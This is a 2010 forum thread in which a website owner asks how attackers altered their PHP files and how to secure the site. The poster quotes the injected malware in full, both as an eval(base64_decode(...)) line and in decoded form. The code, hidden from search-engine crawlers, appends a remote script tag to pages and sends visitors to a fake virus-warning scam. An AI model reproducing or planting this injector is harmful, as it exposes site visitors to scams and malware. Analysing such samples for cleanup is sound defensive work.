Halp my website got broken into and i fixed the code but how do I secure it?

RaidenWoW · 08-20-10, 10:18 AM

Code:

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dWIzZHBjMmx6WkhWa1pYTmpZWEp6TG1OdmJTOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9

was at the top of my index page in a <php tag and decodes to

Quote:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9ub3dpc2l zZHVkZXNjYXJzLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg=="); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R 5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',sub str($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266 D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19 266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF 1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939 226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF 1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939 226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@sub str($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037 E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502 ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82E E9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B 81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

it made the homepage go to some "you have 9 viruses on your pc" website. How did someone modify my index.php file to have that text in it? how could they modify it?

**bacon12** · 08-20-10, 11:00 AM

I suppose you should figure out how they got in before you can fix it. They may have simply guessed the ftp password.

RaidenWoW · 08-20-10, 11:17 AM

every single php file has the code

Quote:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5dWIzZHBjMmx6WkhWa1pYTmpZWEp6TG1O dmJTOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKT sgICB9ICB9"));?>

attached to the beginning of it

Every single one. I'm going to have to go through each of them and erase that line. This sucks.

**bacon12** · 08-20-10, 11:45 AM

You don't have a back up you can simply upload and overwrite?

08-20-10, 11:00 AM	#2
bacon12 Registered User Join Date: Jul 2007 Posts: 3,536	Re: Halp my website got broken into and i fixed the code but how do I secure it? I suppose you should figure out how they got in before you can fix it. They may have simply guessed the ftp password.

08-20-10, 11:45 AM	#4
bacon12 Registered User Join Date: Jul 2007 Posts: 3,536	Re: Halp my website got broken into and i fixed the code but how do I secure it? You don't have a back up you can simply upload and overwrite?